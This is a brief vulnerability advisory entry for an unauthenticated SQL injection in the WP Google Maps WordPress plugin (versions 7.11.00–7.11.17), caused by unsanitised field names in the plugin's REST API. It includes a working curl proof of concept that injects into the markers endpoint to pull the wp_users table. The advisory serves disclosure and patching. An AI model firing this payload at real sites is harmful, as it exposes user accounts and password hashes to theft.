WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection

2019-04-02T00:00:00
ID WPEX-ID:475404CE-2A1A-4D15-BF02-DF0EA2AFDAEA
Type wpexploit
Reporter wpvulndb
Modified 2020-11-19T06:03:54

Description

The includes/class.rest-api.php in the REST API does not sanitize field names before a SELECT statement, leading to an unauthenticated SQL injection issue.

                                        
                                            curl -k --silent "http://example.com/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=fields=3D*+from+wp_users+--+-"